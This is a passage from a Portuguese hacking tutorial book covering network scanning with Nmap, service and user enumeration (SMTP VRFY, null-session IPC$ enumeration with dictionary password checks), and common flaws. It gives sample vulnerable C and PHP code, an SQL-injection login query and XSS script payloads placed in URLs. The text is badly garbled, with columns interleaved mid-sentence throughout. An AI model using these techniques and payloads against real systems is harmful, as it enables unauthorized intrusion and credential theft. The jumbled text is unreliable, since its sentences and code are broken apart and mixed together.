do seu site. Se colocar no shell de comandos do sistema Ping (sem aspas) que descobrem que portas esto abertas no sistema
encontrar algum documento ou informao que voc acha e, na frente, o tambm possuem o
que no endereo IP que ser testado. 47
deveria ser acessada, siga as instrues da ajuda do 5.1.1 Ping 200.195.16.1 recurso de descoberta dos computadores na rede. Assim,
Google de como 46 fica mais fcil e
remover. Observe que recebemos quatro pacotes de resposta, voc precisa usar um programa apenas.
45 mostrando bytes, No exemplo a seguir, testamos o scanner de hosts e
5 Varredura tempo e TTL (time to live). Isso significa que aquele portas mais
O prximo passo do invasor, aps o footprinting, tentar computador est ligado famoso de todos. To conhecido que foi utilizado no filme
uma e ativo na rede. Caso no estivesse, o ping no receberia Matrix Reloaded,
varredura no sistema-alvo, o que conhecemos por resposta (exceto em uma cena na qual a personagem Trinity invadia um
scanneamento. Essa no caso dos firewalls, que falaremos depois). computador.
varredura feita com o intuito de se descobrir s vezes, chega a ser quase impossvel usar o Ping o NMAP.
computadores ativos em uma sozinho para NMAP
determinada rede e quais portas esses sistemas esto varrer grandes redes, a menos que voc crie uma espcie Criado por Fyodor, esse programa o scanner mais
rodando. Tentaremos de script conhecido de
descobrir tambm quais os servios que esto vinculados automatizado ou use uma outra ferramenta. Existem todos, extremamente poderoso e cheio de recursos.
s portas e, se vrias para diversos Utilizado por dez entre
possvel, qual o sistema operacional da mquina. Isso sistemas que automatizam esse processo. D uma olhada dez hackers como parte de seus ataques. Vamos ver as
pode ser feito na seo opes e facilidades
manualmente ou usando ferramentas especficas, Software desse captulo. que esse programa nos oferece para descobrir portas de
chamadas de Scanners. Aps os computadores ativos na rede terem sido servios e
Essa uma etapa importantssima, pois, dependendo de descobertos, chegou computadores na rede. Alguns sistemas podem oferecer
seu resultado, o a hora de tentar descobrir quais portas esto abertas protees em nvel
ataque posterior pode ser muito bem sucedido ou nesses sistemas. de rede que fazem com que pacotes ICMP ou conexes a
totalmente fracassado. 5.2 Descobrindo Portas Abertas nos Computadores determinadas
5.1 Descobrindo Computadores na Rede Outro passo importantssimo. Sem descobrir portas portas, entre outras restries, no consigam ser
Quando voc est dentro de uma rede interna e quer abertas no efetuadas. O NMAP possui
realizar algum sistema, fica muito mais difcil o ataque, tendo que fazer, alguns recursos para tentar burlar esses firewalls e alguns
ataque ou simplesmente escutar informaes alheias, muitas vezes, o deles eu listarei
muitas vezes voc invasor partir para a Engenharia Social na tentativa de aqui. Mais informaes sobre o NMAP em
precisa saber quais computadores esto ligados no abrir uma porta, ou <www.nmap.org>.
momento. A maneira burlar possveis protees. Esse processo j no pode ser 5.2.1 Tipos de Scanneamento
mais simples de se realizar isso atravs do comando feito Apenas digitando nmap <endereo ip> voc
Ping. Ele envia um manualmente, atravs do comando Telnet, por exemplo, rapidamente obtm os
ICMP ECHO ao computador testado e aguarda um ICMP pois existem resultados mostrados anteriormente. Os nmeros das
ECHO_REPLY. Para 65.536 portas, TCP e UDP. A melhor maneira, ento, portas, seu estado
pegar um software
(se esto abertas ou filtradas por firewall) e, ainda, uma dessa ttica de scanneamento que poucos sites iro assumimos que a porta est aberta.
possvel descrio registr-la em -sO Scan do Protocolo IP: Esse modo usado para
do servio que est rodando naquela porta. Uma das arquivos de log. Infelizmente, so necessrios privilgios determinar quais
vantagens do NMAP de root para protocolos IPs so usados no host. A ttica consiste em
48 a construo dos pacotes Syn customizados. enviar pacotes
frente a outros scanners (como Languard, para o sistema -sF -sX sN Modos Stealth FIN, Xmas Tree, ou Null scan: IP
Windows) que Algumas raw sem especificar nenhum cabealho para cada
seus recursos avanados permitem fazer as varreduras do vezes nem mesmo a ttica Syn scanning furtiva o protocolo especfico
modo mais suficiente. Novos na mquina-alvo. Se no recebermos a mensagem do
preciso possvel, passando muitas vezes por protees firewalls e protocolo ICMP
impostas por filtros de pacotes observam por Syns para portas unreachable, ento o protocolo no est sendo usado. Por
firewalls. A seguir, voc v alguns dos recursos avanados restritas, e outro lado,
de programas como Synlogger e Courtney conseguem ns assumimos que est aberto. Note que alguns hosts
scanneamento do NMAP. detectar esse tipo (AIX, HP-UX,
-sT TCP connect() scan: Essa a forma mais bsica de de scanneamento. Por outro lado, essas tcnicas mais Digital UNIX) e firewalls podem no enviar mensagens de
scanneamento. A chamada de sistema connect(), provida avanadas de protocolo
pelo sistema scanneamento (stealth FIN, Xmas Tree, ou Null scan) unreachable. Assim, faz parecer que todos os protocolos
operacional, usada para abrir uma conexo com as podem ser esto
portas. Se a capazes de passar atravs desses filtros sem muitos "abertos".
porta estiver no estado listening, connect() ter sucesso. problemas. -sA ACK scan: Esse modo geralmente usado para
Uma grande -sP Ping scanning: Algumas vezes voc somente quer mapear o
vantagem dessa opo que voc no precisa de saber quais conjunto de regras de um firewall. Em particular, ele pode
nenhum privilgio hosts da rede esto ativos. O NMAP pode fazer isso ajudar a
especial (root). Qualquer usurio pode usar, mesmo com enviando um determinar quando um firewall completo ou somente um
permisses pacote de filtro de
limitadas. Entretanto, o scanneamento mais facilmente requisio ICMP para todo endereo IP especificado da pacotes simples que bloqueia pacotes Syn de chegada.
detectado rede, assim -sW Window scan: Esse modo muito similar ao ACK
por sistemas de IDS. como fizemos manualmente com o Ping no incio deste scan, exceto
-sS TCP Syn scan: Esta ttica muito conhecida como captulo. Essa que, s vezes, pode ser possvel detectar portas abertas
"half-open" opo no modifica em nada o scan de portas. mesmo
scanning, porque no realiza uma conexo TCP completa. 49 sendo filtradas, isso devido anomalia do tamanho da
Enviando -sU UDP scans: Esse modo usado para determinar janela TCP
um pacote com o flag Syn setado, como se fosse abrir quais portas UDP reportado por vrios sistemas operacionais. Sistemas
uma conexo (User Datagram Protocol, RFC 768) esto abertas no host. vulnerveis a
real e esperando pela resposta, uma resposta Syn/ACK A tcnica isso incluem AIX, Amiga, BeOS, BSDI, Cray, Tru64 UNIX,
indica que a implica DG/UX,
porta est no estado listening. Um flag RST indica que a em enviar 0 bytes de dados de pacotes UDP para cada OpenVMS, Digital UNIX, FreeBSD, HP-UX, OS/2, IRIX,
porta no porta da MacOS,
est escutando (non-listening). Se o flag Syn/ACK for mquina-alvo. Se recebermos a mensagem ICMP port NetBSD, OpenBSD, OpenStep, QNX, Rhapsody, SunOS
recebido, o flag unreachable 4.X, Ultrix,
RST imediatamente enviado para encerrar a conexo. (porta ICMP no alcanada), esta porta est fechada. VAX e VxWorks.
A vantagem Seno,
Para mais informaes sobre modo de scanneamento e poder os hosts ativos na rede e as portas que esto diferente de um Linux para um Windows, por exemplo. A
outros abertas nesses melhor maneira de
recursos que esse scanner oferece, consulte o site do sistemas. Mas quais servios essas portas esto rodando? realizarmos isso usando novamente o NMAP. Vamos ver
software: Qual o sistema a opo dele que
<www.nmap.org>. O NMAP tambm fornece uma GUI operacional do alvo? Ser que podemos conseguir extrair realiza essa faanha.
(interface grfica), nomes de usurios -O Essa opo ativa a identificao remota por TCP/IP
ideal para aqueles que no gostam de ficar digitando no em alguns desses servios? Todas essas perguntas sero fingerprinting. Em
shell. respondidas nessa outras palavras, ele usa muitas tcnicas para detectar
50 etapa, a de enumerar os recursos para o passo seguinte. algumas informaes
5.3 Softwares 6.1 Descoberta do Sistema Operacional na pilha do sistema operacional que voc est
5.3.1 Windows Para mim, o primeiro passo aqui tentarmos identificar scanneando. Ele usa essa
NMAP (www.nmap.org) qual o informao para criar uma "impresso digital"
Super Scan (www.foundstone.com) sistema operacional utilizado pelo alvo. Isso vai facilitar (fingerprint) e compar-la
Languard (www.gfi.com) muito para com o seu banco de dados, que contm as impresses de
51 descobrir os outros servios posteriormente. Existem alguns vrios sistemas
5.3.2 Linux mtodos que operacionais, para decidir qual o tipo de sistema que
NMAP (www.nmap.org) podemos usar para descobrir isso. voc est scanneando.
Knocker (http://sourceforge.net/projects/knocker/) 6.1.1 Pesquisar Pginas no Indexadas 54
5.4 Soluo Eu mostrei, na seo de footprinting, como fazer para 6.2 Enumerao dos Servios
No d para impedir que algum tente realizar procurar Como j conhecemos o sistema operacional, temos agora
varredura nos hosts da pginas que no possuem um arquivo padro (como que
sua rede e nas portas do seu sistema. O que voc pode index.htm) e mostram descobrir quais servios esto rodando nas portas que
fazer em relao a uma listagem de arquivos e diretrios. Bem, na grande encontramos abertas.
isso : maioria dos casos, Para isso tambm existem algumas tcnicas que podem
Configurar corretamente o firewall para no responder essas pginas do grandes dicas de qual o sistema ser facilmente
externamente operacional utilizado. utilizadas.
a Ping e outras chamadas ICMP, e restringir o acesso s Na imagem a seguir, percebemos que o sistema Linux, 6.2.1 Leitura de Banners
portas do Fedora e roda Conectar-se porta aberta do sistema e ler o banner do
sistema, salvo quelas de servios muito usados (exemplo: Apache como servidor Web. servio o
servidor 53 mtodo mais simples e o mais utilizado para identificar
Web). 6.1.2 Fingerprint servios. Voc pode
Utilizar um IDS para logar as tentativas de varredura Outra tcnica utilizada para a descoberta do SO o fazer isso manualmente. A seguir foi realizada a conexo
de portas. Assim fingerprint (no a um servidor FTP.
voc pode tentar bloquear tentativas futuras, impedindo confundir com footprinting - fingerprint significa Podemos perceber pelo banner que um ProFTPD verso
o acesso impresso digital). 1.2.8.
daquele endereo IP, ou mesmo reportar a varredura Atravs de recursos, como identificar a pilha do TCP/IP Ou, se quiser, voc pode utilizar um scanner qualquer
para as atravs da anlise para realizar o
autoridades. do TTL (time to live) no recebimento de pacotes ICMP, trabalho por voc (leia mais sobre scanners nos captulos
52 alguns softwares anteriores). A
6 Enumerao conseguem diferenciar um sistema do outro. A grande maioria dos scanners lhe mostra o banner obtido
A enumerao o passo seguinte varredura. J temos implementao dessa pilha na porta. Isso
em nosso
til quando existem muitas portas abertas no sistema e encontrado no sistema. sobre contas, mostra quais tm acesso administrativo,
voc perderia muito Essa tcnica bem interessante para identificar usurios quanto tempo o dono
tempo conectando manualmente cada uma delas. A importantes da conta no muda a senha, informaes sobre o usurio
seguir, utilizamos um no sistema, tais como root, admin, sysop, administrator e da conta,
55 outros, ou para compartilhamentos ativos (mesmo ocultos) e perifricos.
dos inmeros programas que podem ser teis para descobrir o e-mail de algum funcionrio (exemplo: Paulo Algo que agrava
descobrir o servidor Web Jos usa como 57
utilizado em um host. No caso, era o servidor Apache, usurio pjose, pauloj ou paulojose?) ainda mais o problema que o IPC$ permite conexo
verso 1.3.6. Observao: existe outro mtodo envolvendo e-mail, nula, ou seja, no
6.3 Enumerao de Usurios relativamente bobo e necessrio especificar nome de usurio e senha para ler o
Outra coisa que podemos tentar enumerar tambm so os fcil de fazer, mas muito til. Voc pode criar uma conta seu contedo.
usurios do de e-mail em Voc pode se conectar manualmente ao
sistema. Muitas vezes, possvel fazer isso utilizando algum webmail qualquer e enviar e-mails para diversos compartilhamento usando o
pequenos problemas usurios do comando net do Windows, algum cliente similar de
de configurao ou mesmo algumas falhas simples. Vamos sistema-alvo. Vamos supor que voc queira descobrir Linux/Unix ou utilizar um
conhecer duas contas ativas em programa especfico para obter essas informaes
dessas tcnicas. <www.empresaciclano.com>. Envie vrios e-mails para privilegiadas. Vamos
6.3.1 Usurios pelo SMTP contas, como: testar dois deles, ambos para Windows (rodam em Linux
Utilizando o comando VRFY, possvel nos conectarmos a <admin@empresaciclano.com> atravs de wine).
algum <mail@empresaciclano.com> 6.3.2.1 NTInfoScan
servidor SMTP e checarmos se um usurio existe ou no. <sysop@empresaciclano.com> Esse software consegue remover diversas informaes do
Note que a <cpd@empresaciclano.com> compartilhamento
conexo tem que ser feita em modo terminal, utilizando o <user@empresaciclano.com> IPC$ usando autenticao nula. Ele bem simples e possui
Telnet e no <root@empresaciclano.com> uma nica opo
programas que enviam o e-mail. Seria assim: <presidente@empresaciclano.com> relacionada Netbios. Deve-se usar assim: ntis n
telnet www.site.com.br 25 <rh@empresaciclano.com> <endereo ip /
25 a porta TCP do SMTP. <joao@empresaciclano.com> hostname>. Exemplo:
Logo que a conexo for efetuada e aparecer o banner Enfim, use a sua imaginao nos e-mails. O resultado ser ntis n 10.125.0.136
do servidor SMTP, simples: nas Esse comando gerou o resultado mostrado a seguir:
digite o seguinte comando: contas que no existirem, voc receber um e-mail de 58
VRFY <nome do usurio> retorno, dizendo que 6.3.2.2 Netbios Enumeration Utility
Exemplo: aquela conta no existe no sistema. Esse software j mais completo que o NTInfoScan e,
VRFY mflavio 6.3.2 Usurios por Sesso Nula conseqentemente, nos oferece algumas opes extras
250 Marcos Flavio mflavio@site.com.br Existe um compartilhamento que instalado por padro bem interessantes:
56 na maioria nbtenum [-v]
No exemplo anterior, o usurio existe no sistema. Caso o dos sistemas da famlia Windows NT. o IPC$, Inter nbtenum [-h]
usurio no Process nbtenum [-q] [endereo ip | arquivo com endereos ip]
exista, a resposta poderia ser a seguinte: Communication. Esse compartilhamento no de disco, ou [usurio] [senha]
VRFY mflavio seja, no d nbtenum [-a] [endereo ip | arquivo com endereos ip]
550 String does not match anything. para algum invadir, atravs dele, o sistema, mas ele [arquivo dicionrio]
O exemplo anterior significaria que nenhum usurio com fornece informaes nbtenum [-s] [endereo ip | arquivo com endereos ip]
esse nome foi [arquivo dicionrio]
A seguir, a descrio dos comandos: * Leia mais sobre arquivos dicionrios no captulo sobre 7 Falhas e Problemas
-v (verso): Mostra informao da verso. bruteforce (fora bruta). Aps descobrir os hosts ativos e os servios que esto
-h (ajuda): Mostra ajuda. 60 rodando,
-q (questionamento): Enumera informao Netbios no Perceba que o programa obteve no s os identificar esses servios e descobrir usurios e recursos no
host compartilhamentos e sistema, est
especificado ou intervalo de endereos IP. Se o nome de usurios logados na mquina, mas tambm informaes na hora de tentar identificar possveis falhas nesse
usurio e a extras, como as de sistema. Isso pode ser
59 transporte de rede. feito manualmente, atravs de pesquisa (j que voc
senha no forem especificados, o programa ir rodar 6.4 Softwares identificou os recursos
como usurio 6.4.1 Windows do seu alvo) ou utilizando programas prprios para essa
nulo. Se o nome do usurio e a senha forem especificados, NTInfoScan (http://packetstormsecurity.org) anlise. Quando j
o Netbios Enumeration Utility sabemos a verso exata dos servidores que esto
programa ir rodar com essas credenciais fornecidas. (http://packetstormsecurity.org) rodando, a pesquisa
-a (ataque): Enumera informao Netbios no host Winfingerprint (http://www.securityfocus.com) manual costuma ser a mais eficiente. Antes de mostrar
especificado ou 61 como pesquisar,
intervalo de endereos IP e tambm realiza checagem de 6.4.2 Linux vamos entender alguns tipos de falhas mais comuns, alm
senhas. Se NMAP (www.nmap.org) da situao em
um arquivo de dicionrio* no for especificado, o 6.5 Soluo que elas podem ocorrer. Comearei dividindo as falhas
utilitrio ir checar Existem alguns passos que podem ser seguidos para em dois tipos, locais
por senhas em branco e senhas iguais ao nome do evitar o e remotas:
usurio. Se um problema da enumerao. Citarei alguns deles que Falhas locais: um tipo de falha que s pode ser
arquivo dicionrio for especificado, o utilitrio ir checar podem ajudar a explorada
cada conta de amenizar o problema: localmente no sistema, ou seja, um invasor precisaria estar
usurio com todas as senhas especificadas no arquivo Nunca deixar pginas no indexadas no servidor Web. fisicamente usando esse computador ou j possuir acesso
dicionrio*. Utilizar, sempre que possvel, servios de rede local pela
-s (smart attack): Enumera informao Netbios no host criptografados (como Internet. Geralmente, as falhas locais so utilizadas para
especificado SSH e SFTP) para evitar a captura de banners. Se tiver elevao de
ou intervalo de endereos IP e realiza checagem de como privilgios. Por exemplo: atravs de uma falha remota,
senhas somente mudar/esconder o banner nas configuraes de algum ns
se a conta no host no estiver travada. Se um arquivo de servio, faa conseguimos acesso de usurio comum (no-privilegiado)
dicionrio isso. a um
no for especificado, o utilitrio ir checar por senhas em Se possvel, configurar o servidor SMTP para no sistema-alvo. Se o local invadido possuir uma falha local
branco e informar quando o que possa
senhas iguais ao nome de usurio. Se um arquivo usurio no existe e tambm no enviar resposta quando ser explorada, eu elevaria rapidamente o status para
dicionrio for um e-mail superusurio
especificado, o utilitrio ir checar cada conta de usurio destinado a uma conta inexistente chegar (pelo menos, (administrador/root).
com todas as modifique a Falhas remotas: Esse tipo de falha acontece em
senhas especificadas no arquivo dicionrio. mensagem de resposta para uma que no informe qual servidores que
Exemplo: era a conta). escutam conexes externas. Um daemon/servio do
nbtenum q 10.125.0.136 Desabilitar recursos que permitam sesso nula, como o servidor, como
Resultado mostrado a seguir: compartilhamento Netbios IPC$. FTP, Web, POP3, SMTP, SMB/NetBIOS, Universal Plug
62 and Play, X11
etc. Como esses servios fornecem acesso Internet e, em contendo 21 caracteres. Como a funo strcpy, ao programa feito para interagir com esse banco. Seja ASP,
quase contrrio de strncpy, no PHP, JSP ou
90% dos casos, eles requerem algum tipo de faz a checagem do tamanho do espao disponvel, esse qualquer outro tipo de programao para a Web, se o
autenticao, podem vir programa causar programa no
a ter problemas no caso de alguma falha ser encontrada. um estouro de buffer, fazendo com que voc possa incluir interpretar corretamente certos caracteres como barra (/)
Se cdigo e aspas simples
utilizarmos, por exemplo, uma falha no servidor Web IIS personalizado para ser executado pelo programa. (), eles podem ser usados para injetar comandos
5.0 ou Veremos as implicaes naquele sistema,
Apache que ainda no tenha sido corrigida, podemos ter disso depois. burlando sistemas de login e senha, fornecendo acesso
acesso total 7.2 Race Conditions completo ao banco
ao sistema. No caso de falha em um servidor FTP, Outro tipo interessante de falha. Uma race condition de dados muitas vezes.
dependendo da sua (condio de A seguir, um exemplo de formulrio de login e seu
gravidade, poderia nos levar a ter acesso direto ao shell corrida) criada geralmente quando um programa com cdigo:
do sistema. permisses de form name="formLogin" action="login.asp"
7.1 Buffer Overflow usurio comum gera algum recurso, como um arquivo method="post">
o chamado estouro de buffer, falha muito comum hoje. temporrio, com Username : <input type="text" name="Usuario">
Tanto o permisso de usurio administrativo ou superusurio. Esse Password: <input type="text" name="senha">
stack overflow (overflow da pilha) quanto o heap recurso finito, <input type="Login">
overflow (overflow da geralmente durando no mximo at alguns segundos </form>
memria heap) podem ser encontrados em diversos antes de ser apagado. Vamos tentar entrar com um usurio chamado mflavio e a
programas existentes A questo ento : se nesses poucos segundos algum senha
no mercado. O conceito simples; vamos pegar o stack conseguir como 101010. Vejamos um exemplo de como ficaria a
overflow como tomar controle desse recurso com permisses elevadas, instruo SQL:
exemplo. poderia us-los select count(*) from usuarios where nomeUser='mflavio'
63 para aumentar seus privilgios dentro de um determinado and
Suponhamos que eu esteja fazendo um programa em sistema. Para senhaUser='101010'
linguagem C aumentar nossas chances, podemos fazer com que a Como foi mostrado anteriormente, o contedo digitado
(poderia ser qualquer uma) e nele crio um buffer, um mquina processe no tratado
espao na memria mais lentamente, atravs de alguns programas geradores (para checagem de caracteres estendidos), ento esse
destinado a receber entrada de dados. Veja o exemplo de loop, sistema poderia
a seguir: fornecendo, assim, mais alguns segundos de tempo. estar vulnervel. Vamos falar mais sobre isso depois,
#include <stdio.h> 7.3 SQL Injection onde ser mostrado
#include <stdlib.h> Um dos ataques mais comuns hoje a injeo de como explorar esse problema.
int main(int argc, char **argv){ comandos SQL 7.4 PHP Injection
char buffer[10]; (Structured Query Language). Para quem no sabe, SQL 65
strcpy(buffer, testandostackoverflow)); um banco de Muitos defacers hoje adoram essa falha. o mesmo
return 0; dados muito utilizado atualmente, que possui vrias problema do SQL
} verses: Microsoft SQL Injection, um script malfeito, que no trata sua entrada de
Nesse pequeno programa, definimos o tamanho do buffer Server, MySQL etc. dados ou links
como 10 64 corretamente e abre portas para que os mal-
caracteres e copiamos para ele (atravs da funo Esse tipo de falha no do servidor de banco de dados intencionados possam utilizar
strcpy) um texto (string) e, sim, de um
sua criatividade e assim conseguir at rodar comandos no @include("svr/$mypage.php"); link:
sistema. Duvida? } 67
Um grupo de fuadores, chamado Datacha0s, criou at ?> No captulo sobre como explorar falhas, veremos como
uma ferramenta Agora sim, o arquivo $mypage.php, seja ele qual for explorar melhor o
chamada de CSE (que possui extenso GIF, mas de (index.php, XSS para obter cookies alheios.
imagem no tem nada), post.php etc.), tem que estar no diretrio local svr, o que 7.6 Pesquisa Manual
que permite rodar facilmente o shell atravs de scripts impede que seja Como citei anteriormente, a pesquisa, quando bem feita,
vulnerveis de PHP. 66 o recurso
Veja um exemplo de um script com problema. especificado um link externo para outro local. Isso abre mais poderoso para a descoberta de falhas. Isso
<?php if(empty($mypage)) { possibilidade para acontece por um motivo:
@include("info.php"); diversos tipos de ataque, somente limitados pela muitas vezes, os bugs so descobertos e publicados na
} imaginao do invasor. Internet to
else { 7.5 Cross Site Scripting rapidamente que os programas criados para identificar
@include("$mypage"); Tambm chamada simplesmente de CSS ou XSS, o Cross falhas nem sempre
} Site so atualizados com a freqncia desejada e, mesmo que
?> Scripting uma tcnica que visa roubar cookies de fossem, no
No caso anterior, $mypage permite que seja especificado usurios atravs de seus conseguiriam uma porcentagem muito elevada de acertos.
qualquer arquivo, navegadores. Geralmente o invasor injeta comandos Costumam
mesmo aqueles que estejam fora do servidor. Se o HTML e Java Script em mostrar muitos falso-positivos. Mas falaremos disso
programador tivesse alguma funo, conseguindo obter sesses de usurios depois.
colocado um .php na frente, ser que teria alguma mesmo sem ter Primeiramente, vamos pegar um exemplo. Descobrimos
diferena? Vamos ver: autorizao para isso. Qual a utilidade disso, ento? que o
<?php if(empty($mypage)) { Podemos ler o e-mail servidor Web do nosso alvo o IIS 5.0, do Windows
@include("info.php"); de uma pessoa no seu webmail, acessar o seu banco on- 2000. Queremos
} line etc. Tudo sem pesquisar falhas recm-descobertas desse servidor.
else { precisar saber a senha. Vamos usar o Google
@include("$mypage.php"); Vejamos um exemplo de um site fictcio: primeiro:
} www.provedor.com/webmail/mail.pl?action=readmail&lo Digitei +IIS 5.0 +overflow e obtive a seguinte resposta:
?> gin=1 68
No daria muita segurana a mais, j que somente iria Vamos analisar: o script mail.pl passa dois parmetros: Diversos links apareceram, quase todos para sites
especificar que action=readmail e login=1 especializados que
o arquivo mypage deve ser um script, e no um arquivo Se colocarmos alguns comandos HTML, o link poderia ficar publicam falhas de diversos programas. Tambm
com extenso GIF, assim: fornecem informaes
por exemplo. A melhor maneira de proteger, ento, seria www.provedor.com/webmail/mail.pl?action=readmail<sc sobre os problemas e, em grande parte das vezes, como
identificando o ript>alert(V explorar esses
diretrio onde esse arquivo est e incluir essa informao ulnervel a XSS)</script>&login=1 bugs. Ah, como corrigi-los tambm, mas isso veremos
no path, ficando Ou poderamos fazer assim: depois.
assim: www.provedor.com/webmail/mail.pl?action=<script>aler Alm da pesquisa no Google, eu recomendo uma visita
<?php if(empty($page)) { t(Vulnerve ao melhor
@include("svr/info.php"); l a XSS)</script>readmail&login=1 banco de dados existente sobre falhas, localizado no site
} Logo em seguida, o navegador iria retornar a seguinte <www.securityfocus.com>. Farei um passo-a-passo para
else { mensagem ao abrir o mostrar como
simples a pesquisa nele. Novamente queremos pesquisar falha), solution (soluo da falha) e references inclusive j foi mostrado anteriormente: o Languard. Por
falhas sobre o IIS (referncias sobre o padro, quando
5.0. problema). As sees exploit e solution s veremos no voc coloca um alvo para ser scanneado (seja um IP, um
A seguir, temos a pgina principal do site. prximo captulo, intervalo de
69 mas vamos conferir a discusso sobre a falha na imagem endereos IPs ou um domnio), ele automaticamente j
Clique em Vulnerabilities. O banco de dados ir aparecer a seguir: determina as
para pesquisa. Ele 75 possveis falhas encontradas. Apesar de no ser um
pede trs informaes: fabricante, produto e verso. Na Com isso, voc vai entender mais como essa falha ocorre, programa especializado
imagem a seguir, tendo assim em descobrir falhas (alguns, como o Nessus, que veremos
vamos selecionar o fabricante do software que queremos mais chances de conseguir explor-la remotamente. depois, tm um
pesquisar falhas. Quero lembrar que o banco de dados de falhas infinitamente maior); para
70 objetivo desse livro no publicar as falhas recentes, comear, ele serve
Em Vendor, escolhemos Microsoft, j que queremos como muitos bem.
pesquisar falhas outros fazem e, sim, ensinar o leitor a pesquisar essas 77
sobre o IIS 5.0. Aps selecionar a empresa, hora de falhas por si mesmo. No exemplo anterior, rodamos o Languard em um
escolher o produto. O objetivo? As falhas se desatualizam muito rpido, endereo IP
71 ento, em vez de qualquer. Atravs do IPC$ (que j foi explicado antes),
Selecionamos IIS. O ltimo passo, antes de vermos as fornecer o peixe, ensinar a pescar algo muito mais til. ele descobriu que
falhas, Encerramos ento, aqui, a pesquisa manual. Vamos ver esse sistema no possui uma senha para a conta de
selecionar a verso que desejamos do servidor Web da como administrador. Seria
Microsoft. podemos pesquisar de modo automatizado, utilizando os muito simples conseguir logar nele j que no possui
72 chamados nenhum recurso de
Prontinho! Pode ver que as falhas j so mostradas na scanners de vulnerabilidade. Firewall. Essa informao fcil de deduzir analisando os
imagem a seguir: 7.7 Pesquisa Automatizada resultados. O
73 Quando vimos os scanners, praticamente os utilizamos programa identificou portas TCP/UDP e
So agrupadas por data. Procurei e selecionei a falha para descobrir compartilhamentos. O Languard
mais recente da poca hosts ativos na rede, portas e identificar os servios nessas possui verses para Windows e Linux.
em que esse livro estava sendo escrito. Apareceram as portas. Bom, 7.7.2 Shadow Security Scanner
seguintes alguns vo alm. Muitos scanners tambm tm um banco Outro excelente scanner de vulnerabilidade. Baseado no
informaes na tela: de dados de tambm
74 76 excelente Retina, o Shadow Security Scanner (SSS) um
uma falha de buffer overflow na extenso .printer falhas e checam os servios descobertos no host-alvo para dos mais
ISAPI. Ao ler as ver se completos programas de varredura para o sistema
informaes, vemos que a falha remota, que foi descobrem alguma vulnerabilidade. um processo Windows. Ele possui um
publicada em 2001, mas completamente grande banco de dados de falhas e atualizado
foi feito um novo update em fevereiro de 2005, e que automatizado e extremamente simples, que no requer constantemente. O processo
vrios sistemas so nenhum tipo de tambm similar. Voc coloca um endereo IP, intervalo
vulnerveis. Pode ver que estamos na tab info, ainda pesquisa manual. ou domnio e
temos discussion 7.7.1 Languard espera os resultados. A seguir, vemos o resultado de uma
(discusso sobre a falha), exploit (cdigos demonstrando Vamos comear com um programa mais simples de se varredura.
como explorar a usar, que 78
O programa divide-se em trs sees. A da esquerda, mostrados detalhes do scanneamento e o que j foi Nessa primeira tela, voc coloca o IP de onde est o
mostra os encontrado. servidor no
endereos IPs que esto sendo varridos. A da direita, Se o seu desejo apenas varrer o servidor Web de Nessus (nessusd host), a porta do servidor, seu nome de
mostra informaes algum, esse usurio e senha
sobre a mquina e as falhas encontradas. A de baixo, programa a sua melhor opo. difcil ele no para se conectar - por isso o passo de criar o usurio
mostra mais detalhes encontrar nenhum antes. Aps estar
de uma determinada falha, como links e informaes problema atravs dos milhares de problemas testados, conectado, voc tem a opo de ver os Plugins,
especficas, por menor que seja. Preferncias, Opes de
comunicando tambm sobre como corrigir o problema. As 7.7.4 Nessus Scanneamento, Seleo de Alvo, Usurio e KB
falhas mostradas Deixei para mostrar por ltimo o mais completo scanner (Knowledge Base). Vamos
esto distribudas em trs cores: vermelho (falha grave), de falhas conferir um por um.
amarelo (risco existente, e o melhor de tudo, gratuito. Para os sistemas Na aba Plugins voc habilita ou desabilita os plugins que
mdio), verde (risco mnimo). baseados em vm com o
7.7.3 Syhunt TrustSight Linux (exceto o cliente que tambm possui verso programa. Isso til quando voc quer descobrir tipos
Outro excelente scanner. Mas esse um pouco diferente Windows), o Nessus especficos de falhas.
por um possui arquitetura cliente-servidor, possibilitando que Por exemplo, se voc necessitar varrer um sistema Linux,
motivo: ele prprio para scannear servidores Web qualquer pessoa que ento deve
procura de falhas. possua o programa-cliente possa se conectar mquina desabilitar os plugins de descoberta de vulnerabilidade
Como um programa especializado s nessa tarefa, ele na qual est o em Windows. Isso
possui um banco de servidor e realizar scanneamentos a partir dela. At por vai lhe poupar um tempo precioso, alm de lhe deixar
dados muito superior ao dos concorrentes quando se trata questes de menos exposto a
de falhas Web. anonimidade, esse um recurso muito til. Vou dar uma 82
Checa por permutaes, possui recursos para burlar um viso geral de possveis deteces. Voc pode, se quiser, baixar e fazer
sistema IDS 80 upload de novos
(realizando tcnicas como incluir unicode, barras duplas como o programa funciona, j que no to simples plugins ao Nessus, adicionando novas funcionalidades ao
ou triplas, barras como s abrir e digitar programa.
invertidas, as quais veremos mais adiante). Esse programa um endereo IP. Aqui, em preferncias dos plugins, voc pode configurar
foi criado e Primeiro, voc faz o download do programa. Se voc no cada plugin
desenvolvido por um brasileiro. Antigamente, era souber da maneira que quiser. Colocar nome de usurios e
chamado de N-Stealth. compilar, verifique se o seu Linux possui o aplicativo apt- senhas que sero
Observe a janela a seguir: get, que j baixa e testados, diretrios, strings, enfim, poder personalizar
79 instala o programa. Siga as instrues na tela para criar da maneira que
esquerda, temos trs opes: scanner, que o processo o certificado digital desejar, aumentando a chance de descobrir alguma falha
de para ele. Depois, crie um novo usurio. Essa informao se voc j souber
varredura em si; IDS Test, no qual voc pode configurar est toda bem informaes sobre o sistema-alvo.
quais opes de explicada no site do programa. Depois que tiver tudo 83
tentativa de ocultamento de sistemas IDS voc deseja; e instalado, rode o A seguir temos as opes de escaneamento. Aqui, voc
Database, que o servidor digitando nessusd D. vai colocar o
banco de dados de falhas. Essa opo permite que voc Agora, s rodar o cliente, digitando nessus. A tela a range de portas, se quiser considerar as portas no-
acrescente suas seguir scanneadas como
prprias URLs a serem testadas no site alvo. direita, na aparecer: fechadas; o nmero de hosts para testar ao mesmo
janela maior, so 81 tempo; o nmero de
checagens que tambm devero ser testadas ao mesmo apenas testar hosts que j foram testados ou somente Prontinho! esquerda, mostram-se os hosts que foram
tempo; o caminho testar hosts que scanneados e,
para os CGIs a serem testados, se quiser realizar um nunca foram testados. Tambm temos outras opes, como direita, portas e falhas descobertas, alm da uma
lookup reverso no IP no executar janela maior com
(para pegar o nome de domnio) antes de test-lo; a scanners que j foram executados, no executar plugins informaes completas sobre esses bugs.
otimizao do teste; que j foram Relembrando: o Nessus o scanneador de falhas mais
as checagens seguras; alm de designar hosts pelo seu 86 completo de
endereo MAC e usados e somente mostrar diferenas do scanneamento todos e, depois da opo de pesquisa manual, a melhor
optar pelo scanneamento desconectado (com opo de anterior (muito til opo para
